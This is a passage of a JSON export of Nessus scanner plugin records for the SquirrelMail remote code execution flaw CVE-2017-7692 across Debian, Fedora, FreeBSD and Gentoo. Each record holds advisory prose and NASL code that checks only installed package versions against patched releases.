Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00012.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/squirrelmail\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"squirrelmail\", reference:\"2:1.4.23~svn20120406-2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:45", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "title": "Fedora 26 : squirrelmail (2017-a7161eb173)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-07-17T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-A7161EB173.NASL", "href": "https://www.tenable.com/plugins/nessus/101697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-a7161eb173.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101697);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-a7161eb173\");\n\n script_name(english:\"Fedora 26 : squirrelmail (2017-a7161eb173)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-a7161eb173\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"squirrelmail-1.4.22-19.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T10:59:07", "description": "SquirrelMail developers report :\n\nSquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN)\nallows post-authentication remote code execution via a sendmail.cf\nfile that is mishandled in a popen call. 
It's possible to exploit this\nvulnerability to execute arbitrary shell commands on the remote\nserver.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-08-23T00:00:00", "title": "FreeBSD : SquirrelMail -- post-authentication remote code execution (e1de77e8-c45e-48d7-8866-5a6f943046de)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-08-23T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:squirrelmail"], "id": "FREEBSD_PKG_E1DE77E8C45E48D788665A6F943046DE.NASL", "href": "https://www.tenable.com/plugins/nessus/102691", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102691);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-7692\");\n\n script_name(english:\"FreeBSD : SquirrelMail -- post-authentication remote code execution (e1de77e8-c45e-48d7-8866-5a6f943046de)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"SquirrelMail developers report :\n\nSquirrelMail 1.4.22 (and other versions before 20170427_0200-SVN)\nallows post-authentication remote code execution via a sendmail.cf\nfile that is mishandled in a popen call. 
It's possible to exploit this\nvulnerability to execute arbitrary shell commands on the remote\nserver.\"\n );\n # https://vuxml.freebsd.org/freebsd/e1de77e8-c45e-48d7-8866-5a6f943046de.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?29050a63\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"squirrelmail<20170705\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:15:12", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-05T00:00:00", "title": "Fedora 25 : squirrelmail (2017-f85c37ae3d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-F85C37AE3D.NASL", "href": "https://www.tenable.com/plugins/nessus/100609", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 
FEDORA-2017-f85c37ae3d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100609);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"FEDORA\", value:\"2017-f85c37ae3d\");\n\n script_name(english:\"Fedora 25 : squirrelmail (2017-f85c37ae3d)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f85c37ae3d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected squirrelmail package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"squirrelmail-1.4.22-19.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"squirrelmail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:50:17", "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "edition": 22, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-15T00:00:00", "title": "Debian DSA-3852-1 : squirrelmail - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-05-15T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:squirrelmail"], "id": "DEBIAN_DSA-3852.NASL", "href": "https://www.tenable.com/plugins/nessus/100166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3852. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100166);\n script_version(\"3.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"DSA\", value:\"3852\");\n\n script_name(english:\"Debian DSA-3852-1 : squirrelmail - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/squirrelmail\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3852\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the squirrelmail packages.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"squirrelmail\", reference:\"2:1.4.23~svn20120406-2+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:06:21", "description": "The remote host is affected by the vulnerability described in GLSA-201709-13\n(SquirrelMail: Remote Code Execution)\n\n It was discovered that the sendmail.cf file is mishandled in a popen\n call.\n \nImpact :\n\n A remote attacker, by enticing a user to open an e-mail attachment,\n could execute arbitrary shell commands.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-09-18T00:00:00", "title": "GLSA-201709-13 
: SquirrelMail: Remote Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-09-18T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:squirrelmail"], "id": "GENTOO_GLSA-201709-13.NASL", "href": "https://www.tenable.com/plugins/nessus/103281", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201709-13.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103281);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-7692\");\n script_xref(name:\"GLSA\", value:\"201709-13\");\n\n script_name(english:\"GLSA-201709-13 : SquirrelMail: Remote Code Execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201709-13\n(SquirrelMail: Remote Code Execution)\n\n It was discovered that the sendmail.cf file is mishandled in a popen\n call.\n \nImpact :\n\n A remote attacker, by enticing a user to open an e-mail attachment,\n could execute arbitrary shell commands.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201709-13\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Gentoo has 
discontinued support for SquirrelMail and recommends that\n users unmerge the package:\n # emerge --unmerge 'mail-client/squirrelmail'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:squirrelmail\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-client/squirrelmail\", unaffected:make_list(), vulnerable:make_list(\"lt 1.4.23_pre20140426\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SquirrelMail\");\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:15:10", "description": "fix insufficient escaping of user-supplied data (CVE-2017-7692)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-05T00:00:00", "title": "Fedora 24 : squirrelmail (2017-0b6da97aa5)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "modified": "2017-06-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:squirrelmail", "cpe:/o:fedoraproject:fedora:24"], "id": "FEDORA_2017-0B6DA97AA5.NASL", "href": "https://www.tenable.com/plugins/nessus/100603", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# 
